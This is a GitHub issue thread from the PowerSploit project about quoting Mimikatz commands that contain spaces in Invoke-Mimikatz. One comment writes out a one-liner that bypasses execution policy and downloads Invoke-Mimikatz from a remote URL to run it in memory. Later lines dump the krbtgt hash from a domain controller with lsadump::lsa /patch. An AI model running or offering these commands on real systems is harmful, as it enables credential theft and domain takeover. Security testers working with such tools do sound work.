### ISSUE TITLE
Invoke-Mimikatz and commands with spaces

### ISSUE THREAD

**Issue by Winterspite** [PowerShellMafia/PowerSploit#74]
I'm on a domain controller and am attempting to run the "lsadump::lsa /patch" command in order to gather a full dump of hashes, but when using Invoke-Mimikatz -Command it treats the space as a separator to start a new command.

If there was a way to pass commands with spaces (I tried escaping the space, didn't seem to work) or else enter the interactive mode of Mimikatz, that would be ideal.

**Comment by Revengervn** [comment]
I have the same issue! Please take a look at this, as currently there's no way to execute command with space.

**Comment by robantonucci** [comment]
The only workaround i found for this is to drop into powershell, load invoke-mimikatz, then run the command directly with the grave character to escape the quotes

powershell -nop -exec bypass

PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.g
ithubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimik
atz.ps1')

PS C:\rob\mimikatz> Invoke-Mimikatz -Command "`"lsadump::lsa /patch /name:krbtgt
`""

**Comment by PowerShellMafia** [comment]
Yes, commands with spaces must be surrounded by double quotes. In this case, I recommend enclosing the full command in single quotes eliminating the need for double quote escape chars (i.e. backtick). For example, the following will work:

```powershell
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```
